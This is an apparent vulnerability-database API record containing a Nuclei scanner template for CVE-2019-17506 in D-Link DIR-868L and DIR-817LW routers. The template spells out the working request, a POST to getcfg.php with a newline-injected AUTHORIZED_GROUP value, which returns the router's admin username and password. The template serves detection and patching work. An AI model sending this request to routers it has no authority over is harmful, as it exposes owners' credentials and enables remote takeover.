{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2019-17506/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2019-17506/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2019-17506/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2019-17506/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2019-17506/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2019-17506"},"sightings":{"href":"/api/v1/sightings/cve-2019-17506"}},"data":{"nuclei":true,"nuclei_template":"http/cves/2019/CVE-2019-17506.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2019-17506\n\ninfo:\n  name: D-Link DIR-868L/817LW - Information Disclosure\n  author: pikpikcu\n  severity: critical\n  description: |\n    D-Link DIR-868L B1-2.03 and DIR-817LW A1-1.04 routers are vulnerable to information disclosure vulnerabilities because certain web interfaces do not require authentication. An attacker can get the router's username and password (and other information) via a DEVICE.ACCOUNT value for SERVICES in conjunction with AUTHORIZED_GROUP=1%0a to getcfg.php. This could be used to control the router remotely.\n  impact: |\n    An attacker can exploit this vulnerability to gain access to sensitive information, such as router configuration settings and credentials.\n  remediation: |\n    Apply the latest firmware update provided by D-Link to fix the information disclosure vulnerability.\n  reference:\n    - https://github.com/dahua966/Routers-vuls/blob/master/DIR-868/name%26passwd.py\n    - https://nvd.nist.gov/vuln/detail/CVE-2019-17506\n    - https://github.com/openx-org/BLEN\n    - https://github.com/sobinge/nuclei-templates\n    - https://github.com/SexyBeast233/SecBooks\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2019-17506\n    cwe-id: CWE-306\n    epss-score: 0.56386\n    epss-percentile: 0.99011\n    cpe: cpe:2.3:o:dlink:dir-868l_b1_firmware:2.03:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: dlink\n    product: dir-868l_b1_firmware\n  tags: cve,cve2019,dlink,router,disclosure,vkev,vuln\n\nhttp:\n  - method: POST\n    path:\n      - \"{{BaseURL}}/getcfg.php\"\n\n    body: |\n      SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a\n\n    headers:\n      Content-Type: text/xml\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"</password>\"\n          - \"DEVICE.ACCOUNT\"\n        condition: and\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a00473045022100b8c5b43bdba94430537f9ca8ac631ceeb3590a8f05fa729da1dff404909bc68002200557e66daf1b0fbc01c06bdd46dad4a046431db927214e8552e84ae5b2aacf28:922c64590222798bb761d5b6d8e72950"},"source":"nuclei","vuln_id":"cve-2019-17506"}